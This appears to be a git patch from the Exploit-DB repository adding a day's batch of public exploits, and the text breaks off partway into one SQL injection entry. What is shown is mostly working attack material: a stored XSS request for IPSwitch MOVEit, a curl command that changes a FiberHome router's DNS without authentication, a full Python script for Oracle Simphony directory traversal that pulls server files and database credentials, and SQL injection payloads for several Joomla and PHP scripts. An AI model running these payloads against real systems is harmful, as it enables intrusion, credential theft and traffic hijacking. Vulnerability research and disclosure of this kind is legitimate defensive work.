From d12dffd438c850ba2c45106a90ad30fd7f4d3b13 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 3 Feb 2018 05:01:48 +0000
Subject: [PATCH] DB: 2018-02-03

21 changes to exploits/shellcodes

Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation
Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection
Event Manager 1.0 - SQL Injection
Fancy Clone Script - 'search_browse_product' SQL Injection
Real Estate Custom Script - 'route' SQL Injection
Advance Loan Management System - 'id' SQL Injection
IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting
Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection
Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection
Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection
Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload
Joomla! Component JMS Music 1.1.1 - SQL Injection
Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal
FiberHome AN5506 - Unauthenticated Remote DNS Change

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)
Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)
Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode
Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)
Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
---
 exploits/aspx/webapps/43947.txt     |   45 ++
 exploits/hardware/webapps/43961.txt |   54 ++
 exploits/multiple/webapps/43960.py  |  197 +++++
 exploits/php/webapps/43940.html     |   32 +
 exploits/php/webapps/43941.txt      |   49 ++
 exploits/php/webapps/43942.txt      |   37 +
 exploits/php/webapps/43943.txt      |   45 ++
 exploits/php/webapps/43948.html     |   33 +
 exploits/php/webapps/43949.txt      |   27 +
 exploits/php/webapps/43950.txt      |   26 +
 exploits/php/webapps/43957.txt      |   26 +
 exploits/php/webapps/43958.txt      |   27 +
 exploits/php/webapps/43959.txt      |   71 ++
 exploits/windows/local/43962.c      |  450 +++++++++++
 exploits/windows/webapps/43883.txt  |    2 +-
 files_exploits.csv                  |   14 +
 files_shellcodes.csv                |    6 +
 shellcodes/generator/43955.py       |  124 +++
 shellcodes/linux_x86-64/43951.nasm  |  112 +++
 shellcodes/linux_x86-64/43952.nasm  |   89 +++
 shellcodes/linux_x86-64/43953.nasm  |   23 +
 shellcodes/linux_x86-64/43954.nasm  |   37 +
 shellcodes/linux_x86-64/43956.c     | 1087 +++++++++++++++++++++++++++
 23 files changed, 2612 insertions(+), 1 deletion(-)
 create mode 100644 exploits/aspx/webapps/43947.txt
 create mode 100644 exploits/hardware/webapps/43961.txt
 create mode 100755 exploits/multiple/webapps/43960.py
 create mode 100644 exploits/php/webapps/43940.html
 create mode 100644 exploits/php/webapps/43941.txt
 create mode 100644 exploits/php/webapps/43942.txt
 create mode 100644 exploits/php/webapps/43943.txt
 create mode 100644 exploits/php/webapps/43948.html
 create mode 100644 exploits/php/webapps/43949.txt
 create mode 100644 exploits/php/webapps/43950.txt
 create mode 100644 exploits/php/webapps/43957.txt
 create mode 100644 exploits/php/webapps/43958.txt
 create mode 100644 exploits/php/webapps/43959.txt
 create mode 100644 exploits/windows/local/43962.c
 create mode 100755 shellcodes/generator/43955.py
 create mode 100644 shellcodes/linux_x86-64/43951.nasm
 create mode 100644 shellcodes/linux_x86-64/43952.nasm
 create mode 100644 shellcodes/linux_x86-64/43953.nasm
 create mode 100644 shellcodes/linux_x86-64/43954.nasm
 create mode 100644 shellcodes/linux_x86-64/43956.c

diff --git a/exploits/aspx/webapps/43947.txt b/exploits/aspx/webapps/43947.txt
new file mode 100644
index 000000000..24e0b5fe1
--- /dev/null
+++ b/exploits/aspx/webapps/43947.txt
@@ -0,0 +1,45 @@
+# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS)
+# Date: 1-31-2017
+# Software Link: https://www.ipswitch.com/moveit
+# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable)
+# Exploit Author: 1N3@CrowdShield - https://crowdshield.com (Early Warning Security)
+# Contact: https://twitter.com/crowdshield
+# Vendor Homepage: https://www.ipswitch.com 
+# Category: Webapps
+# Attack Type: Remote
+# Impact: Data/Cookie Theft 
+
+
+1. Description
+ 
+IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks. 
+
+
+2. Proof of Concept
+
+The vulnerability lies in the Send Message -> Body Text Area input field.
+ 
+POST /human.aspx?r=692492538 HTTP/1.1
+Host: host.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: https://host.com/human.aspx?r=510324925
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 598
+
+czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=%5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=<iframe/src=javascript:alert(1)>&attachment=&opt07=1&arg05_Send=Send
+
+
+3. Solution:
+
+Update to version 9.5
+
+
+4. Disclosure Timeline
+
+1/30/2017 - Disclosed details of vulnerability to IPSwitch.
+1/31/2017 - IPSwitch confirmed the vulnerability and verified the fix as of version 9.5 and approved public disclosure of the vulnerability.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/43961.txt b/exploits/hardware/webapps/43961.txt
new file mode 100644
index 000000000..c533bf4d9
--- /dev/null
+++ b/exploits/hardware/webapps/43961.txt
@@ -0,0 +1,54 @@
+#  FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability
+#
+#  Software Version RP2617
+#  Device Model AN5506-04-F
+#  Vendor Homepage: www.fiberhome.com/
+#
+#
+#  Date: 01/02/2018
+#  Exploit Author: r0ots3c
+#  http://wandoelmo.com.br
+#  https://www.facebook.com/wsec.info
+#
+#  Description:
+#  Vulnerability exists in web interface
+#  This router has vulnerabilities where you can get information or edit
+configurations in an unauthenticated way.
+#  The biggest risk is the possibility of changing the dns of the device.
+#
+#  Modifying systems' DNS settings allows cybercriminals to
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites:
+#       These sites can be phishing pages that
+#       spoof well-known sites in order to
+#       trick users into handing out sensitive
+#       information.
+#
+#    o  Replacing ads on legitimate sites:
+#       Visiting certain sites can serve users
+#       with infected systems a different set
+#       of ads from those whose systems are
+#       not infected.
+#
+#    o  Controlling and redirecting network traffic:
+#       Users of infected systems may not be granted
+#       access to download important OS and software
+#       updates from vendors like Microsoft and from
+#       their respective security vendors.
+#
+#    o  Pushing additional malware:
+#       Infected systems are more prone to other
+#       malware infections (e.g., FAKEAV infection).
+#
+#
+
+Proof of Concept:
+
+VIA CURL:
+curl 'http://<TARGET>/goform/setDhcp'  -H 'Cookie: loginName=admin' -H
+--data
+'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=<MALICIOUS
+DNS1>dhcpSecDns=<MALICIOUS
+DNS2>&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text='
+--compressed -k -i
\ No newline at end of file
diff --git a/exploits/multiple/webapps/43960.py b/exploits/multiple/webapps/43960.py
new file mode 100755
index 000000000..c1c268827
--- /dev/null
+++ b/exploits/multiple/webapps/43960.py
@@ -0,0 +1,197 @@
+# Exploit Title: Oracle Hospitality Simphony (MICROS) directory traversal 
+# Date: 30.01.2018
+# Exploit Author: Dmitry Chastuhin (https://twitter.com/_chipik)
+# Vendor Homepage: http://www.oracle.com/
+# Version: 2.7, 2.8 and 2.9
+# Tested on: Win, nix
+# CVE : CVE-2018-2636
+
+
+#!/usr/bin/env python
+
+# https://twitter.com/_chipik
+# Sorry for bad code practises. This is just a PoC, don't blame us very hard ¯\_(ツ)_/¯
+import requests
+import argparse
+import unicodedata
+
+
+def rm_right(str):
+    rez=""
+    k=0
+    for i in range(len(str)):
+        rez = rez + str[k:k+2]
+        k=k+4
+    return rez
+
+
+def add_right(str,char):
+    rez=""
+    k=0
+    for i in range(len(str)/2):
+        rez= rez + str[k:k+2]+char
+        k=k+2
+    return rez
+
+
+def rm_left(str):
+    rez=""
+    k=2
+    for i in range(len(str)):
+        rez = rez + str[k:k+2]
+        k=k+4
+    return rez
+
+
+def add_left(str,char):
+    rez=""
+    k=0
+    for i in range(len(str)/2):
+        rez= rez + char + str[k:k+2]
+        k=k+2
+    return rez
+
+
+def send(data,dos=0):
+    if args.verb:
+        print "[DBG] \n"+data.encode("hex")
+    if dos:
+        try:
+            r = requests.post(base_uri, headers=headers, data=data, timeout=0.001)
+        except:
+            return
+    else:
+        r = requests.post(base_uri, headers=headers, data=data)
+    if r.status_code == 200:
+        if args.verb:
+            print "[DBG] HEX:"
+            print unicodedata.normalize('NFKD', r.text).encode('ascii','ignore').encode("hex")
+            print "\n[DBG] RAW:\n"+r.text
+        print ""
+        return unicodedata.normalize('NFKD', r.text).encode('ascii','ignore')
+    else:
+        print "[DBG] status code: %d" % r.status_code
+        print "[DBG] text       : %s" % repr(r.text)
+
+
+def calculate_len(filename):
+    len2 = (len(filename)+8)/2
+    len1 = len2 + 8
+    len0 = len1 + 124
+    if args.verb:
+        print "len2="+str('{0:02x}'.format(len2))
+        print "len1="+str('{0:02x}'.format(len1))
+        print "len0="+str('{0:04x}'.format(len0))
+    return str('{0:04x}'.format(len0)),str('{0:02x}'.format(len1)),str('{0:02x}'.format(len2))
+
+
+def cli_info():
+    print "[*] Let's get info about server"
+    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
+    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
+    poc_suf1='\x0a\x10\x00\x00\x00\x10\x00\x18\x00\x00\x00\x84\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x01\xe1\x1e\x02\x00\x00\x00\x36\x00\x00\x00\x3c\x00\x53\x00\x49\x00\x2d\x00\x53\x00\x65\x00\x63\x00\x75\x00\x72\x00\x69\x00\x74\x00\x79\x00\x20\x00\x56\x00\x65\x00\x72\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x3d\x00\x22\x00\x32\x00\x22\x00\x20\x00\x2f\x00\x3e\x00\x58\x52\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1d\xb8\x58\x00\x00\xb1\x36\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02'
+    poc = poc_pref+poc_body+poc_suf1
+    full_rez = send(poc)
+    return full_rez
+
+
+def cli_dbinfo():
+    print "[*] Let's get DB creds"
+    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
+    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
+    poc_suf1='\x0a\x10\x00\x00\x00\x10\x00\x18\x00\x00\x00\xa0\x73\x71\x33\x49\x71\x35\x50\x54\x74\x66\x32\x6b\x42\x73\x53\x48\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x01\xe1\x1e\x02\x00\x00\x00\x36\x00\x00\x00\x3c\x00\x53\x00\x49\x00\x2d\x00\x53\x00\x65\x00\x63\x00\x75\x00\x72\x00\x69\x00\x74\x00\x79\x00\x20\x00\x56\x00\x65\x00\x72\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x3d\x00\x22\x00\x32\x00\x22\x00\x20\x00\x2f\x00\x3e\x00\xbd\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1d\x88\x96\x00\x00\x35\x53\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x24\x00\x00\x00\x0d\x00\x44\x62\x49\x6e\x66\x6f\x52\x65\x71\x75\x65\x73\x74\x01\x00\x00\x00\x01\x00\x06\x00\x6d\x53\x70\x61\x72\x65\x08\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02'
+    poc = poc_pref+poc_body+poc_suf1
+    full_rez = send(poc)
+    return full_rez
+
+
+def cli_log_list():
+    print "[*] Let's get log list"
+    poc = "0c200000001000290000013872663850506e79467478667275366577687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f0000003c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d38223f3e3c736f61703a456e76656c6f706520786d6c6e733a736f61703d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d61223e3c736f61703a426f64793e3c50726f6365737344696d655265717565737420786d6c6e733d22687474703a2f2f6d6963726f732d686f7374696e672e636f6d2f45476174657761792f22202f3e3c2f736f61703a426f64793e3c2f736f61703a456e76656c6f70653e0a100000001000180000008e72663850506e794674786672753665776170706c69636174696f6e2f6f637465742d73747265616d01e11e02000000360000003c00530049002d00530065006300750072006900740079002000560065007200730069006f006e003d0022003200220020002f003e00a5980000000000000000000001c11c0100000001d11d98a20000b13600000100000000000000000000001e00000012000000050000000a000000240024006c006f0067001dd1021cc1021ee1020000"
+    full_rez = send(poc.decode("hex"))
+    return full_rez
+
+
+def cli_read_log(filename):
+    log2="log\\"+filename
+    print "[*] Let's read %s" % log2
+    log = add_left(log2.encode("hex"),"00")
+    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
+    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
+    poc_suf_1_1='0A100000001000180000'
+    poc_suf_1_ses='66497a3263516c56444c35305045356e'
+    poc_suf_1_2='6170706C69636174696F6E2F6F637465742D73747265616D01E11E02000000360000003C00530049002D00530065006300750072006900740079002000560065007200730069006F006E003D0022003200220020002F003E00C2AF0000000000000000000001C11C0100000001D11D8EBA0000B13600000100000000000000000000001E000000'
+    poc_suf_1_len0, poc_suf_1_len1, poc_suf_1_len2 = calculate_len(log)
+    poc_suf_1_3='00000006000000'
+    poc_suf_1_4='000000240024'
+    poc_suf1=(poc_suf_1_1+poc_suf_1_len0+poc_suf_1_ses+poc_suf_1_2+poc_suf_1_len1+poc_suf_1_3+poc_suf_1_len2+poc_suf_1_4).decode("hex")
+    poc_logname = log.decode("hex")
+    if len(log2) % 2 == 1:
+        poc_suf2='001dd1021cc1021ee1020000'.decode("hex")
+    else:
+        poc_suf2='001dd1021cc1021ee102'.decode("hex")
+    poc = poc_pref+poc_body+poc_suf1+poc_logname+poc_suf2
+    full_rez = send(poc)
+    return full_rez
+
+
+def cal_tst():
+    file = "ServiceHostPrereq2012Sql\BootToDesktop.reg"
+    suf = file.encode('utf-16le')
+    print suf
+    pre = "\x0c \x00\x00\x00)\x00)\x00\x00\x04muuid:4382e7a6-607d-4392-b5df-d4b8bfcf4185\x00\x00\x00http://schemas.xmlsoap.org/soap/envelope/\x00\x00\x00"
+    xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/03/addressing\" xmlns:wsse=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\" xmlns:wsu=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"><soap:Header><wsa:Action>http://micros-hosting.com/EGateway/ProcessDimeRequest</wsa:Action><wsa:MessageID>uuid:12e52d09-38dc-4071-810d-7ced9a3bfd59</wsa:MessageID><wsa:ReplyTo><wsa:Address>http://schemas.xmlsoap.org/ws/2004/03/addressing/role/anonymous</wsa:Address></wsa:ReplyTo><wsa:To>http://172.16.2.207:8080/EGateway/EGateway.asmx</wsa:To><wsse:Security><wsu:Timestamp wsu:Id=\"Timestamp-dd366974-3fbb-4e40-b868-ef9303548245\"><wsu:Created>2017-07-11T22:18:58Z</wsu:Created><wsu:Expires>2017-07-11T22:19:28Z</wsu:Expires></wsu:Timestamp></wsse:Security></soap:Header><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>"
+    suf_1 = "\x00\x00\x00\x0a\x10\x00\x00\x00)\x00\x18\x00\x00\x00\xf3uuid:d9706c6f-d103-45b2-9ca2-ec588dab1c7d\x00\x00\x00application/octet-stream\x01\xe1\x1e\x02\x00\x00\x00\x00\x00\x00\x00N\x1c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1dM\x1c\x01\x00kB\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\xad\x00\x00\x00\x01\x00\x00\x002\x00\x00\x00kB\x00\x00\x00\x00\x00\x00\x03\x01\x04\x8a\x15\x00\x00\x00\x11\x00\x00\x00\x18\x00\x00\x00W\x00o\x00r\x00k\x00s\x00t\x00a\x00t\x00i\x00o\x00n\x001\x00\\\x00\x00\x00"
+    suf_2 = "\x01\xadf\xd7\x00\x00\x00\x00\x00\x17t\x00\x00\x8e\x00\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02\x00"
+    rez_S = suf_1+suf+suf_2
+    data =pre+xml+rez_S
+
+    print suf.decode('utf-16le')
+
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
+    parser.add_argument('-H', '--host', default='127.0.0.1', help='host')
+    parser.add_argument('-P', '--port', default='8080', help='port')
+    parser.add_argument('-i', '--info', action='store_true', help='information about micros installation')
+    parser.add_argument('-d', '--dbinfo' ,action='store_true',  help='information about micros db (usernames and hashes)')
+    parser.add_argument('-l', '--log', action='store_true', help='information about log files')
+    parser.add_argument('-s', '--ssl', action='store_true', help='enable SSL')
+    parser.add_argument('-r', '--read', help='read file from server (root dir is c:\\. Ex.: windows\\win.ini) Also u can use 1 - for SimphonyInstall.xml and 2 - for DbSettings.xml' )
+    parser.add_argument('-v', '--verb', action='store_true', default=0, help='verb')
+    args = parser.parse_args()
+    headers = dict()
+    if args.ssl:
+        base_uri = 'https://%s:%s%s' % (args.host, args.port, '/EGateway/EGateway.asmx')
+    else:
+        base_uri = 'http://%s:%s%s' % (args.host, args.port, '/EGateway/EGateway.asmx')
+
+    headers['SOAPAction'] = '\"http://micros-hosting.com/EGateway/ProcessDimeRequest\"'
+    headers['Content-Type']= 'application/dime'
+    headers['Expect'] = '100-continue'
+
+    if args.info:
+        results = cli_info()
+        if results.find('\x00\x55\x00\x6e\x00\x61\x00\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x69\x00\x7a\x00\x65\x00\x64') != -1:
+            print "[*] Your instance is not vulnerable to CVE-2018-2636"
+        else:
+            print "[!] Your instance is vulnerable to CVE-2018-2636"
+        print results
+        exit()
+    if args.dbinfo:
+        print cli_dbinfo()
+        exit()
+    if args.log:
+        print cli_log_list()
+        exit()
+    if args.read:
+        if args.read == "1":
+            print cli_read_log("..\\..\\..\\SimphonyInstall.xml")
+            exit()
+        if args.read == "2":
+            print cli_read_log("..\\DbSettings.xml")
+            exit()
+        else:
+            print cli_read_log(args.read)
+            exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/43940.html b/exploits/php/webapps/43940.html
new file mode 100644
index 000000000..70c8b2b68
--- /dev/null
+++ b/exploits/php/webapps/43940.html
@@ -0,0 +1,32 @@
+<!--
+# # # # #
+# Exploit Title: Joomla! Component JEXTN Membership 3.1.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://www.jextn.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/membership-a-subscriptions/jextn-membership/
+# Version: 3.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)	
+# # # # #
+-->
+<html>
+<body>
+<form action="http://localhost/index.php?option=com_jemembership&view=myplans&task=myplans.usersubscriptions" method="post">
+<input name="usr_plan" value="(SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(1=1,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)" type="hidden">
+<input type="submit" value="Ver Ayari">
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/43941.txt b/exploits/php/webapps/43941.txt
new file mode 100644
index 000000000..fa533c7c6
--- /dev/null
+++ b/exploits/php/webapps/43941.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Fancy Clone Script - 'search_browse_product' SQL Injection
+# Date: 2018-01-31
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://pofitec.com/
+# Software Link: https://pofitec.com/fancy-clone-script.php
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2018-01-31
+
+Product & Service Introduction:
+===============================
+Laravel Ornate is a Multi vendor Social Ecommerce marketplace script inspired from the world famous peer to peer marketplace like Fancy and Etsy.
+
+Technical Details & Description:
+================================
+
+SQL injection on [search_browse_product] POST parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/browse_product
+
+Parameter: search_browse_product (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND 2261=2261 AND '%'='
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND EXTRACTVALUE(7589,CONCAT(0x5c,0x71717a6271,(SELECT (ELT(7589=7589,1))),0x7176767171)) AND '%'='
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND SLEEP(5) AND '%'='
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 26 columns
+    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71717a6271,0x6d466b6977594d6d6c626c746e6f515674706e7a785545577768526a484455594e5a426a46484b70,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Itxn
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/exploits/php/webapps/43942.txt b/exploits/php/webapps/43942.txt
new file mode 100644
index 000000000..6f570f5c3
--- /dev/null
+++ b/exploits/php/webapps/43942.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Real Estate Custom Script - 'route' SQL Injection
+# Date: 2018-01-31
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/real-estate-custom-script/21268075
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2018-01-31
+
+Product & Service Introduction:
+===============================
+Real Estate Custom Script is based on Custom PHP framework, Script was born to be ahead in innovation and at the peak of the real estate portal solutions.
+
+Technical Details & Description:
+================================
+
+SQL injection on [route] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/index.php?route=property/category
+
+Parameter: route (GET)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: route=property/category'||(SELECT 'coKq' FROM DUAL WHERE 3062=3062 AND (SELECT 7059 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(7059=7059,1))),0x7176717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&filter_propertystatus=1&filter_propertycategory=63&filter_city=any&filter_address=any&filter_country_id=223&filter_zone_id=&filter_range=1;10&
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/exploits/php/webapps/43943.txt b/exploits/php/webapps/43943.txt
new file mode 100644
index 000000000..8a09f44db
--- /dev/null
+++ b/exploits/php/webapps/43943.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Advance Loan Management System - 'id' SQL Injection
+# Date: 2018-01-31
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/advance-loan-management-system-with-savings-system-and-sms-notification/21283070
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2018-01-31
+
+Product & Service Introduction:
+===============================
+LMS – Make your Bank Loan Management easy LMS is a Modern and Responsive Loan management system.
+
+Technical Details & Description:
+================================
+
+SQL injection on [id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
